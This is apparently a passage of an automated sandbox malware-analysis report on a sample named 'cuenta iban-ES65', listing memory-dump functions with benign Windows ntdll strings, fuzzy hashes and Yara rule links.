Opcode Fuzzy Hash: 93b9a982cc1c6e9cc8d6c977e19312104af40ae02e314ee2ed3052983884e900
Instruction Fuzzy Hash: E8E1DF74A05B45EFF714CF68C441B7ABBE2AF48314F14896AE4968F246EB34E941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 3775F4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 377A00C7
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 377A00F1
RTL: Re-Waiting, xrefs: 377A0128

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 2704d625b1a3200355ddd9808acca4fbc40da159980de101d7a46047655eb4f9
Instruction ID: ee70af8971970e901fc5052bf7cb28b78688c1469b9bd4887ed7aaa03dc21a27
Opcode Fuzzy Hash: 2704d625b1a3200355ddd9808acca4fbc40da159980de101d7a46047655eb4f9
Instruction Fuzzy Hash: 82E19974608741DFE711CF28C884B5AB7E2AB85364F100E69F5A58F2E1EB74E946CB42

Uniqueness

Uniqueness Score: -1.00%

Function 37730C12 Relevance: 4.1, Strings: 3, Instructions: 317COMMON

Download Yara Rule

Strings

pr7, xrefs: 3778EFD0, 3778EE83, 3778ED45
Failed to retrieve service checksum., xrefs: 3778EC5D
ResIdCount less than 2., xrefs: 3778ECD0

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: Failed to retrieve service checksum.$ResIdCount less than 2.$pr7
API String ID: 0-390280630
Opcode ID: b0c75bf9d8d0e7b4fcf5adf5113ff66699e17606194818e87ac9986dd0279997
Instruction ID: a116e1dc287b6340284e534f9a95e34690edcec4773743f1ff2e5231a9ecbca3
Opcode Fuzzy Hash: b0c75bf9d8d0e7b4fcf5adf5113ff66699e17606194818e87ac9986dd0279997
Instruction Fuzzy Hash: 54E112B5908784EFE324CF15C085B9BBBE1BB88715F00892EE5D99B241DB749909CF93

Uniqueness

Uniqueness Score: -1.00%

Function 377B330C Relevance: 4.0, Strings: 3, Instructions: 292COMMON

Download Yara Rule

Strings

\SystemRoot\system32\, xrefs: 377B34C2
@, xrefs: 377B351F
DelegatedNtdll, xrefs: 377B334E

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: @$DelegatedNtdll$\SystemRoot\system32\
API String ID: 0-2391371766
Opcode ID: ace5ffd8cd04b432d0280ca0bee00a0a8ed986e57fcfab744e72e48a2ca96f8e
Instruction ID: d7d020d4e28bec1b547c2e6ac3d87dd3270cba65ffe79126931db8b4dbbbf4ed
Opcode Fuzzy Hash: ace5ffd8cd04b432d0280ca0bee00a0a8ed986e57fcfab744e72e48a2ca96f8e
Instruction Fuzzy Hash: 1DB1C371604341AFEB21CF54C885B6BB7E9FB4C758F414929FA509F250DBB4E888CB92

Uniqueness

Uniqueness Score: -1.00%

Function 3772A147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

UseFilter, xrefs: 3772A171
FilterFullPath, xrefs: 3778C075
\??\, xrefs: 3778BF73

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 05637379345384b03ba4b1019cef0afe83efd8a999394bb139a94572fb724e5c
Instruction ID: 755f751430333fe676e89cfc2b02c909ea6fb43b8d4aae5e79823cd93fd0cc54
Opcode Fuzzy Hash: 05637379345384b03ba4b1019cef0afe83efd8a999394bb139a94572fb724e5c
Instruction Fuzzy Hash: 8DA18075D01629AFDB21DF24CC89B9AB7F8EF04720F1109E9E918AB250DB349E84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 3780B2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON

Download Yara Rule

Strings

GlobalizationUserSettings, xrefs: 3780B3B4
\Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3780B3AA
TargetNtPath, xrefs: 3780B3AF

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
API String ID: 0-505981995
Opcode ID: 56776974ee73195f338fca559d2a2c78f06c2448092e071e58753ff2361ab1fa
Instruction ID: a0c71ce82892cba51b52d878d13380aca9fd7b942a18f33c8c67de1caa290c15
Opcode Fuzzy Hash: 56776974ee73195f338fca559d2a2c78f06c2448092e071e58753ff2361ab1fa
Instruction Fuzzy Hash: 3C617172D41629ABEB21DF58DC88BD9BBB8AB14754F4101E9E508AB250CB74DE84CF90

Uniqueness

Uniqueness Score: -1.00%

Function 3772F75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 3778E442
HEAP[%wZ]: , xrefs: 3778E435
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3778E455

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: e18230beb458faa170063bb8639a49b1ce3aace710d29503aae73629065f8577
Instruction ID: cb4b21088b8588b073b9c5208bdc175e76d202ff64a7eb93ab632ae9c50b4f73
Opcode Fuzzy Hash: e18230beb458faa170063bb8639a49b1ce3aace710d29503aae73629065f8577
Instruction Fuzzy Hash: 7D513335610784EFE312CBA4C889F5ABBF9EF04754F0444A4E5609FA92DB78EA01DB12

Uniqueness

Uniqueness Score: -1.00%

Function 37751514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON

Download Yara Rule

Strings

Could not validate the crypto signature for DLL %wZ, xrefs: 3779A396
LdrpCompleteMapModule, xrefs: 3779A39D
minkernel\ntdll\ldrmap.c, xrefs: 3779A3A7

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 84a7d813166d5cc5e7076d5e982d53b7736a8eab7797f1b7361d15f9b934602e
Instruction ID: 583353c47c6a898918a3d9429cbba926a5809ed801f33665a0a5df64442aa850
Opcode Fuzzy Hash: 84a7d813166d5cc5e7076d5e982d53b7736a8eab7797f1b7361d15f9b934602e
Instruction Fuzzy Hash: 30512574B01741DBFB11CB6CC984B6A77E6EB05774F110AA8E8529F6E2DB74E900CB41

Uniqueness

Uniqueness Score: -1.00%

Function 377DD62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 377DD79F
Heap block at %p modified at %p past requested size of %Ix, xrefs: 377DD7B2
HEAP[%wZ]: , xrefs: 377DD792

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
API String ID: 0-3815128232
Opcode ID: 71914e7fe738a6b2a536abb9789d262e8e8cd61c00ef35994250d9761955fc24
Instruction ID: 08f91f99a3f26b809eeea94b1041dffba9840f96436eacecf566ed6e6ba46382
Opcode Fuzzy Hash: 71914e7fe738a6b2a536abb9789d262e8e8cd61c00ef35994250d9761955fc24
Instruction Fuzzy Hash: 9C51F379100750CEE360CA29C84477277E2EB453A8F518C8BE4D5AF585EA2AE846DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 3772753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON

Download Yara Rule

Strings

Invalid address specified to %s( %p, %p ), xrefs: 3778AD5A
HEAP: , xrefs: 3778AD47
HEAP[%wZ]: , xrefs: 3778AD3A

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
API String ID: 0-1151232445
Opcode ID: f398edeedfac6e54df82ccd25bb1144b39dbbc4cdd7f314047971cab132b57c4
Instruction ID: 70569f1636c38618c1d0752af7f55f08a97ac472959d06fdc088b427fc0a9713
Opcode Fuzzy Hash: f398edeedfac6e54df82ccd25bb1144b39dbbc4cdd7f314047971cab132b57c4
Instruction Fuzzy Hash: F54187782003409FEB14CE28C1C5BB5B7E29F01369F6148AEC595CF65ADB34E841DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 377615EF Relevance: 3.9, Strings: 3, Instructions: 127COMMON

Download Yara Rule

Strings

LdrpAllocateTls, xrefs: 377A194A
minkernel\ntdll\ldrtls.c, xrefs: 377A1954
TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 377A1943

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
API String ID: 0-4274184382
Opcode ID: d155d6ba2391dcce55df1b1de24d5e09a290d4fa6bc3073051391ed33463fdae
Instruction ID: 795612666b4a540eee140fdf5a3bcb3b9ab676e2f447a5a5545b39d7eee72baf
Opcode Fuzzy Hash: d155d6ba2391dcce55df1b1de24d5e09a290d4fa6bc3073051391ed33463fdae
Instruction Fuzzy Hash: 71418EB5A01204AFEB15CFA8CC49BADBBB5FF48314F048569E405BB351DB38A801CF91

Uniqueness

Uniqueness Score: -1.00%

Function 377BB214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON

Download Yara Rule

Strings

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 377BB2B2
@, xrefs: 377BB2F0
GlobalFlag, xrefs: 377BB30F

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
API String ID: 0-4192008846
Opcode ID: 81e808b3c00780b87b8fc9611fcbcf81b8b78e9b1f59c9dded4dbf74a5d04c20
Instruction ID: 5942652dfcabb542740d577c7cdcd8fe13eec7bc3cb55f543f008e75a2baf5a6
Opcode Fuzzy Hash: 81e808b3c00780b87b8fc9611fcbcf81b8b78e9b1f59c9dded4dbf74a5d04c20
Instruction Fuzzy Hash: CB316DB1D00209AEDF10DFA5CC88BEEBBBDEF44344F440469EA05AB151D7749A04CB91

Uniqueness

Uniqueness Score: -1.00%

Function 37761527 Relevance: 3.8, Strings: 3, Instructions: 98COMMON

Download Yara Rule

Strings

LdrpInitializeTls, xrefs: 377A1851
minkernel\ntdll\ldrtls.c, xrefs: 377A185B
DLL "%wZ" has TLS information at %p, xrefs: 377A184A

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
API String ID: 0-931879808
Opcode ID: 4c666de1408dc84757230bfbad6f255fd695c3ff08593ab5981af94b50ba3943
Instruction ID: 5ed65685d11727cc3b84ad2dfbf137f8c360d2da3f62c2ccb028d0dcf1330bf6
Opcode Fuzzy Hash: 4c666de1408dc84757230bfbad6f255fd695c3ff08593ab5981af94b50ba3943
Instruction Fuzzy Hash: 20316871B80300FFF7108B58CC4EF6AB768BB40769F010569E841BF195EB74AD4587A1

Uniqueness

Uniqueness Score: -1.00%

Function 377B85AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 377B85DE

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: c7c097e438d9da1a25a26b7f2c05861fa00f4b1c3e1af3be66eb0b945bf17d66
Instruction ID: df74abd9a8f56635d240e2fb96e08a5305d595b250e3cbb9d8c21faf0178fdbb
Opcode Fuzzy Hash: c7c097e438d9da1a25a26b7f2c05861fa00f4b1c3e1af3be66eb0b945bf17d66
Instruction Fuzzy Hash: 11012B752412049FDF305E51D888B663B66FF493ADF401899E4016F593CB28AC85FFD6

Uniqueness

Uniqueness Score: -1.00%

Function 3780A526 Relevance: 3.4, APIs: 2, Instructions: 425COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: b426b2151345d719dc8a2687bc85942fe84f68ca5a9314ab68ca24a3a295e9e3
Instruction ID: 54b7c5be368dbc1580f34577f84f1671362bcc1153b46cde30378f03e8f4294e
Opcode Fuzzy Hash: b426b2151345d719dc8a2687bc85942fe84f68ca5a9314ab68ca24a3a295e9e3
Instruction Fuzzy Hash: 62F1D676E00126AFCB18CEA8CDE05BDFBB1AF64250B164169D462EB380D734ED45CF81

Uniqueness

Uniqueness Score: -1.00%

Function 377451C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON

Download Yara Rule

Strings

@, xrefs: 37745365
@, xrefs: 377454C3

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: d7459f0ddddd3a3756ae0919e63c9a13bc039cf4a96576281d42d114886c1391
Instruction ID: 72b9343cd71389551ee84e4677c2f6148b5c79aa9c51d5375e5a0ee35c08ce0e
Opcode Fuzzy Hash: d7459f0ddddd3a3756ae0919e63c9a13bc039cf4a96576281d42d114886c1391
Instruction Fuzzy Hash: 39329FB46083518BD724CF14C480B7EB7E2EF8A7A4F50492EF9959F290EB34E944CB52

Uniqueness

Uniqueness Score: -1.00%

Function 37735622 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 37735698
RtlDebugPrintTimes.NTDLL ref: 3779061D

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: bdb7e646ffa453049e01b703583fe7764a3e47c0385398253f15384ff7640bfd
Instruction ID: 5a6f9d4dc2477065866b950f893e77f29510a8044083497a170a60eee5157923
Opcode Fuzzy Hash: bdb7e646ffa453049e01b703583fe7764a3e47c0385398253f15384ff7640bfd
Instruction Fuzzy Hash: FA31B035302B06FFE7469B25C984B9AFB66BF45BA8F404125E9009FA51DB74E821CFC1

Uniqueness

Uniqueness Score: -1.00%

Function 377F9ED2 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 377F9FCB
`, xrefs: 377FA0D1

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 6fdcb962b8def70188f23157c1bc2e236176fcf66154499c8901e01eec91a068
Instruction ID: 08c1c01ed3a64f5824e4ff805c2c8a0e3cc8714388852d415138af63eb9ad3ed
Opcode Fuzzy Hash: 6fdcb962b8def70188f23157c1bc2e236176fcf66154499c8901e01eec91a068
Instruction Fuzzy Hash: 0DC1CF712083429BE714CF24CA80B6BBBE6AFC5764F054E2DF595DA290D77AE504CB42

Uniqueness

Uniqueness Score: -1.00%

Function 377AE372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 377AE3D1
Legacy, xrefs: 377AE3DA

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 00e0a685191ad9fda251301471218de668300b6299cd4d2f12690be9582e286a
Instruction ID: 78b68b154add0d6677bf39edd8a786c7cf48a99c2ea0f92b422768858f8124f7
Opcode Fuzzy Hash: 00e0a685191ad9fda251301471218de668300b6299cd4d2f12690be9582e286a
Instruction Fuzzy Hash: D3614AB1E103089FEB54CFA8D881BADB7B9BB48740F14456EE549EF351EB70A900CB61

Uniqueness

Uniqueness Score: -1.00%

Function 3780B55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON

Download Yara Rule

Strings

\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 3780B5C4
RedirectedKey, xrefs: 3780B60E

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
API String ID: 0-1388552009
Opcode ID: c2cca511a9cb92f808e8b71556908de5a96b67325fe42e846320268a71902848
Instruction ID: 1920e53087bc434363538425dd74a42f019546f65e500461b8f7a0c66fb1ba8c
Opcode Fuzzy Hash: c2cca511a9cb92f808e8b71556908de5a96b67325fe42e846320268a71902848
Instruction Fuzzy Hash: D461E0B5801218EFDF11DF98CC89ADEBFB9FB08714F50406AE805A7250DB789A45DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 3774F640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON

Download Yara Rule

Strings

$, xrefs: 3774F780
$, xrefs: 3774F716

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$
API String ID: 3446177414-233714265
Opcode ID: b145abda118796a67f38c6c71ee6e23a6d14c3e2c5db6be0f22b02bebc567715
Instruction ID: 5394bd63f8604f7d8f98a7935e901ade98b4627f0a49917435a3b629df44ed2f
Opcode Fuzzy Hash: b145abda118796a67f38c6c71ee6e23a6d14c3e2c5db6be0f22b02bebc567715
Instruction Fuzzy Hash: A361FF75A01749DFEB21CFA4C588BBDBBF2BF44314F444869E104AF690CB38A942CB81

Uniqueness

Uniqueness Score: -1.00%

Function 377C314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Exit, xrefs: 377C318E
LdrResGetRCConfig Enter, xrefs: 377C317C

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
API String ID: 0-118005554
Opcode ID: 3b228a6840e010477ffff273edcb563f5433368ebed14a6a435716fe482bbfd0
Instruction ID: 90a09704045282b8395e4ba89ecb8d6272a49eba8f226aa7957ed19e50719e75
Opcode Fuzzy Hash: 3b228a6840e010477ffff273edcb563f5433368ebed14a6a435716fe482bbfd0
Instruction Fuzzy Hash: 6D31DE752487429BE711CB68D884B2AB7E5EF8D764F000869F8548F391EB35E905CB93

Uniqueness

Uniqueness Score: -1.00%

Function 377306CF Relevance: 2.6, Strings: 2, Instructions: 95COMMON

Download Yara Rule

Strings

r7, xrefs: 37730733
r7, xrefs: 37730739

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: r7$ r7
API String ID: 0-3688132438
Opcode ID: d6304ed983a4eca029fcab49bbc3b653db42891684e388931e9829e3ca7e8302
Instruction ID: 23253cffb5b9ca6a341173fe5a2c4250dd9549e36757da0f360fbc06d305bdfd
Opcode Fuzzy Hash: d6304ed983a4eca029fcab49bbc3b653db42891684e388931e9829e3ca7e8302
Instruction Fuzzy Hash: 6431E436606709ABEB11CE24C888E7B77A7AB846A1F014528FC949F311DB30DC11DBE2

Uniqueness

Uniqueness Score: -1.00%

Function 377633D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

RtlpInitializeAssemblyStorageMap, xrefs: 377A289A
SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 377A289F

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
API String ID: 0-2653619699
Opcode ID: 3900101a154f0312ddf3cf5402ad48648966ad7c0d3069b74bd0335a103829ce
Instruction ID: 823bcb54a9c17971a520dd0f242150dfe15c7e8b2965b2dcef1343dd5784f3ce
Opcode Fuzzy Hash: 3900101a154f0312ddf3cf5402ad48648966ad7c0d3069b74bd0335a103829ce
Instruction Fuzzy Hash: 54110672B00304ABF7158A48CC45F6A7AA9DBC8754F20843DBD04DF348DA74ED0087A1

Uniqueness

Uniqueness Score: -1.00%

Function 3776A4F0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 3776A504
Threadpool!, xrefs: 3776A509

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
